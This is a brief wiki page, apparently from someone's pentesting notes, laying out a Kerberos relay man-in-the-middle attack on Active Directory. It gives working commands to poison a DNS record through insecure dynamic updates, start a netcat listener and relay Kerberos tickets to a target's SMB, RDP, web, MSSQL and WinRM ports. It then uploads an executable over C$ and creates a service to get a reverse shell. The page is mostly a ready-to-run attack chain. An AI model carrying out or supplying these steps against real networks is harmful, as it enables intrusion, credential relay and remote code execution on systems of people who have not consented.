MITM Kerberos relay RPC - oscpname/RELAY_scenarios GitHub Wiki

MANUAL: https://www.youtube.com/watch?v=fUqCL_NtVAo

Tools:

• Krbrelayex-RPC
• adddns

KrbRelayEx-RPC is a tool designed for performing Man-in-the-Middle (MitM) attacks by relaying Kerberos AP-REQ tickets.

attacker IP - 192.168.212.11

1. Check that DNS zones with insecure updates enabled

2. Prepare setup of fake RPC server to listen to the event

# replace DNS record using unsecure updates (if enabled)
python3 adddns.py --domain MYLAB.LOCAL --dnsip 192.168.212.21 --hostip 192.168.212.11 --hostname ADCS-MYLAB

# prepare listener
nc -nlvp 12345

#start relay tool, 192.168.212.43 - target 
sudo dotnet ./KrbRelayEx.dll -spn cifs/adcs-mylab.mylab.local -console -redirecthost 192.168.212.43 -redirectports 445,3389,80,443,1433,5985

3. when event happens and we capture interactive shell

use c$
put /home/andrea/s.exe temp\s.exe
service-create tamarro c:\temp\s.exe
#get reverse  shell